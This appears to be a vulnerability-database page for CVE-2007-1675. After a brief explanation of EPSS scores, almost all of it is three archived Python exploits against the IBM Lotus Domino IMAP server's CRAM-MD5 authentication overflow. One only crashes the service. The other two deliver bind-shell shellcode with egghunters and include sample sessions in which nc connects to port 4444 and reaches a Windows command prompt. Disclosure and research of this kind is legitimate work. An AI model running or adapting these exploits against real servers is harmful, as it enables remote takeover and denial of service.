CVE-2007-1675 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

#!/usr/bin/python # # Remote DOS exploit code for IBM Lotus Domino Server 6.5. Tested on windows # 2000 server SP4. The code crashes the IMAP server. Since this is a simple DOS # where 256+ (but no more than 270) bytes for the username crashes the service # this is likely to work on other windows platform aswell. Maybe someone can carry this further and come out # with a code exec exploit. # # Author shall bear no reponsibility for any screw ups caused by using this code # Winny Thomas :-) # import sys import md5 import struct import base64 import socket def ExploitLotus(target): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target, 143)) response = sock.recv(1024) print response auth = 'a001 authenticate cram-md5\r\n' sock.send(auth) response = sock.recv(1024) print response # prepare digest of the response from server m = md5.new() m.update(response[2:0]) digest = m.digest() payload = 'A' * 256 # the following DWORD is stored in ECX # at the time of overflow the following call is made # call dword ptr [ecx]. However i couldnt find suitable conditions under which a stable pointer to our shellcode # could be used. Actually i have not searched hard enough :-). payload += struct.pack('<L', 0x58585858) # Base64 encode the user info to the server login = payload + ' ' + digest login = base64.encodestring(login) + '\r\n' sock.send(login) response = sock.recv(1024) print response if __name__=="__main__": try: target = sys.argv[1] except IndexError: print 'Usage: %s <imap server>\n' % sys.argv[0] sys.exit(-1) ExploitLotus(target) # milw0rm.com [2007-03-29]

#!/usr/bin/python # # IBM Lotus Domino Server 6.5 PRE AUTH Remote Exploit # Tested on windows 2003 server SP0. # Coded by Mati Aharoni # muts@offensive-security.com # http://www.offensive-security.com # Notes: # * Not the the faint of heart. # * Iris, I love you # Skeleton exploit shamelessly ripped off Winny Thomas # # bt ~ # ./domino 192.168.0.38 # [*] IBM Lotus Domino Server 6.5 Remote Exploit # [*] muts {-at-} offensive-security.com # # [*] Sending bindshell *somewhere* into memory # [*] Sending bindshell *somewhere* into memory # [*] Sending bindshell *somewhere* into memory # [*] Sending bindshell *somewhere* into memory # * OK Domino IMAP4 Server Release 6.5 ready Sat, 31 Mar 2007 01:45:32 -0800 # # + PDAwMzU5QjhGLjg4MjU3MkFGLjAwMDAwQkMwLjAwMDAwMDA4QFRFU1QuQ09NPg== # # [*] Triggering overwrite, ph33r. # [*] You may need to wait up to 2 minutes # [*] for egghunter to find da shell. # bt ~ # date # Sat Mar 31 11:47:07 GMT 2007 # bt ~ # nc -v 192.168.0.38 4444 # 192.168.0.38: inverse host lookup failed: Unknown host # (UNKNOWN) [192.168.0.38] 4444 (krb524) open # Microsoft Windows [Version 5.2.3790] # (C) Copyright 1985-2003 Microsoft Corp. # #C:\Lotus\Domino> import sys import md5 import struct import base64 import socket def sendbind(target): bindshell ="\x90"* 400 # Metasploit bind shell port 4444 bindshell +="\x54\x30\x30\x57\x54\x30\x30\x57" bindshell +=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" "\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58" "\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47" "\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58" "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38" "\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a" "\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30" "\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57" "\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58" "\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30" "\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c" "\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44" "\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50" "\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f" "\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33" "\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f" "\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f" "\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50" "\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d" "\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45" "\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f" "\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38" "\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55" "\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d" "\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d" "\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38" "\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35" "\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37" "\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56" "\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56" "\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54" "\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54" "\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53" "\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51" "\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35" "\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35" "\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c" "\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f" "\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f" "\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e" "\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a") sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target, 143)) response = sock.recv(1024) bind = 'a001 admin ' + bindshell +'\r\n' print "[*] Sending bindshell *somewhere* into memory" sock.send(bind) response = sock.recv(1024) sock.close() def ExploitLotus(target): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target, 143)) response = sock.recv(1024) print response auth = 'a001 authenticate cram-md5\r\n' sock.send(auth) response = sock.recv(1024) print response m = md5.new() m.update(response[2:0]) digest = m.digest() payload = "\x90" * 12 + "\x33\xd2\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + 'A' * 210 # 0x774b4c6a CALL [EAX +4] payload += "jLKw" payload += "\x90\x90\x90\x83\xE8\x52\x83\xE8\x52\x83\xE8\x52\xFF\xE0" login = payload + ' ' + digest login = base64.encodestring(login) + '\r\n' print "[*] Triggering overwrite, ph33r." sock.send(login) sock.close() print "[*] You may need to wait up to 2 minutes" print "[*] for egghunter to find da shell." if __name__=="__main__": try: target = sys.argv[1] except IndexError: print '[*] IBM Lotus Domino Server 6.5 Remote Exploit \n[*] muts {-at-} offensive-security.com\r\n' print '[*] Usage: %s <imap server>\n' % sys.argv[0] sys.exit(-1) print '[*] IBM Lotus Domino Server 6.5 Remote Exploit \n[*] muts {-at-} offensive-security.com\r\n' sendbind(target) sendbind(target) sendbind(target) sendbind(target) ExploitLotus(target) # milw0rm.com [2007-03-31]

########################################################################################### # Lotus Domino IMAP4 Server Release 6.5.4 / Windows 2000 Advanced Server x86 Remote Exploit ########################################################################################### # Vulnerable: IBM Lotus Domino <= 7.0.2 && 6.5.5 FP2 (tested 6.5.4) # Authors: Dominic Chell <dmc@digitalapocalypse.net> & prdelka # # Exploitation steps: # 1) The instruction "call dword [ecx]" is performed with user supplied ECX # 2) EAX reference our buffer from retaddr onward # 3) we put pointer in ECX to a pointer referencing "call eax" # 4) a small payload decrements eax and then jmp's into the eax buffer due # to size limitations. # 5) our larger payload is then executed. # # muts exploit would not work for us, his egghunt uses 0x2e which is converted # to 0x09 (.'s to [tab]'s) and his return address was not found on our test # environment. # # Finding a Target: # To find a target, attach a debugger to nimap.exe, cause the application # to crash. Then use search function to find "call eax" or equivilant # instruction in memory. Then, take the pointer to eax, such as "0x77ff1122" # and search for another location in memory that has "0x11 0xff 0x77". This # will be utilised for a return address if no instruction modify eax or # subvert execution to another place in memory. # # Thanks to: nemo, hdm, jf, Winny Thomas, muts # ########################################################################################### # Note: it takes a few minutes for the egghunter to find the payload in memory # # For example: # C:\work\exploits\imap>poc.py # [*] sending payload # [*] sending payload # [*] sending payload # [*] sending payload # * OK Domino IMAP4 Server Release 6.5.4 ready Tue, 26 Jun 2007 15:18:36 +0100 # # PDAwNEU5QkNCLjgwMjU3MzA2LjAwMDAwOUY4LjAwMDAwMDA5QERNQz4= # # sending... # kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ # kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ # kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ # kJCQkJCQkJCQkJCQkJCQkJCQkJCQkNvS2XQk9FgpybEKu3E1If4xWBcDWBeDmcnDC2rgYnVG+2Q3 # BG5572VAQQov6VasmyGZmqi4dlFEk/x9Zwv0gcDrZXeQkJCD6FKD6FKD6FL/4CB4OcnLXAvHq421 # M2iR5FFG # # # C:\work\exploits\imap>nc -vv 192.168.126.130 4444 # 2KVM-DC [192.168.126.130] 4444 (?) open # Microsoft Windows 2000 [Version 5.00.2195] # (C) Copyright 1985-1999 Microsoft Corp. # # E:\Lotus\Domino> # ########################################################################################### import socket, struct, md5, base64, sys, string, signal, getopt class Exp_Lotus: def __init__(self): self.host='127.0.0.1' self.port=143 def send_payload(host,port): payload ="\x54\x30\x30\x57\x54\x30\x30\x57" payload += ("\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf7" "\x82\xf8\x80\x83\xeb\xfc\xe2\xf4\x0b\xe8\x13\xcd\x1f\x7b\x07\x7f" "\x08\xe2\x73\xec\xd3\xa6\x73\xc5\xcb\x09\x84\x85\x8f\x83\x17\x0b" "\xb8\x9a\x73\xdf\xd7\x83\x13\xc9\x7c\xb6\x73\x81\x19\xb3\x38\x19" "\x5b\x06\x38\xf4\xf0\x43\x32\x8d\xf6\x40\x13\x74\xcc\xd6\xdc\xa8" "\x82\x67\x73\xdf\xd3\x83\x13\xe6\x7c\x8e\xb3\x0b\xa8\x9e\xf9\x6b" "\xf4\xae\x73\x09\x9b\xa6\xe4\xe1\x34\xb3\x23\xe4\x7c\xc1\xc8\x0b" "\xb7\x8e\x73\xf0\xeb\x2f\x73\xc0\xff\xdc\x90\x0e\xb9\x8c\x14\xd0" "\x08\x54\x9e\xd3\x91\xea\xcb\xb2\x9f\xf5\x8b\xb2\xa8\xd6\x07\x50" "\x9f\x49\x15\x7c\xcc\xd2\x07\x56\xa8\x0b\x1d\xe6\x76\x6f\xf0\x82" "\xa2\xe8\xfa\x7f\x27\xea\x21\x89\x02\x2f\xaf\x7f\x21\xd1\xab\xd3" "\xa4\xd1\xbb\xd3\xb4\xd1\x07\x50\x91\xea\xe9\xdc\x91\xd1\x71\x61" "\x62\xea\x5c\x9a\x87\x45\xaf\x7f\x21\xe8\xe8\xd1\xa2\x7d\x28\xe8" "\x53\x2f\xd6\x69\xa0\x7d\x2e\xd3\xa2\x7d\x28\xe8\x12\xcb\x7e\xc9" "\xa0\x7d\x2e\xd0\xa3\xd6\xad\x7f\x27\x11\x90\x67\x8e\x44\x81\xd7" "\x08\x54\xad\x7f\x27\xe4\x92\xe4\x91\xea\x9b\xed\x7e\x67\x92\xd0" "\xae\xab\x34\x09\x10\xe8\xbc\x09\x15\xb3\x38\x73\x5d\x7c\xba\xad" "\x09\xc0\xd4\x13\x7a\xf8\xc0\x2b\x5c\x29\x90\xf2\x09\x31\xee\x7f" "\x82\xc6\x07\x56\xac\xd5\xaa\xd1\xa6\xd3\x92\x81\xa6\xd3\xad\xd1" "\x08\x52\x90\x2d\x2e\x87\x36\xd3\x08\x54\x92\x7f\x08\xb5\x07\x50" "\x7c\xd5\x04\x03\x33\xe6\x07\x56\xa5\x7d\x28\xe8\x07\x08\xfc\xdf" "\xa4\x7d\x2e\x7f\x27\x82\xf8\x80") try: s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect((host,port)) d=s.recv(1024) print "[*] sending payload" s.send('a001 admin ' + payload + '\r\n') d=s.recv(1024) s.close() except: "Can't connect to IMAP server" def usage(): print sys.argv[0] + "\n\n\tLotus Domino 6.5.4 Windows 2000 Advanced Server x86 Exploit\n\tauthor: dmc@digitalapocalypse.net & prdelka" print "\t-h host" print "\t-p port" sys.exit(2) def signal_handler(signal, frame): print 'err: caught sigint, exiting' sys.exit(0) def exp(host, port): buffer = "\x90" * 193 buffer += ("\xdb\xd2\xd9\x74\x24\xf4\x58\x29\xc9\xb1\x0a\xbb\x71\x35\x21" "\xfe\x31\x58\x17\x03\x58\x17\x83\x99\xc9\xc3\x0b\x6a\xe0\x62" "\x75\x46\xfb\x64\x37\x04\x6e\x79\xef\x65\x40\x41\x0a\x2f\xe9" "\x56\xac\x9b\x21\x99\x9a\xa8\xb8\x76\x51\x44\x93\xfc\x7d\x67" "\x0b\xf4\x81") try: s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect((host,port)) d=s.recv(1024) print d s.send('a001 authenticate cram-md5\r\n') d=s.recv(1024) d=d[2:1022].strip() print d m=md5.new() m.update(d) digest = m.digest() buffer += struct.pack('<L', 0x7765ebc0) # call eax 6014DC6E (ptr to 6014DC68) buffer += "\x90\x90\x90\x83\xE8\x52\x83\xE8\x52\x83\xE8\x52\xFF\xE0" buffer = buffer + ' ' + digest s.send(base64.encodestring(buffer) + '\r\n') print "\nsending...\n", base64.encodestring(buffer) , '\r\n' except: "Can't connect to IMAP server" def main(argv=None): if argv is None: argv = sys.argv[1:] if not argv: usage() try: opts, args = getopt.getopt(argv, 'h:p:') except getopt.GetoptError: usage() signal.signal(signal.SIGINT, signal_handler) ex = Exp_Lotus() for o, a in opts: if o == '-h': ex.host=a.strip() elif o =='-p': ex.port = int(a) host = ex.host port = ex.port send_payload(host,port) send_payload(host,port) send_payload(host,port) send_payload(host,port) exp(host, port) if __name__ == '__main__': main() # milw0rm.com [2007-07-20]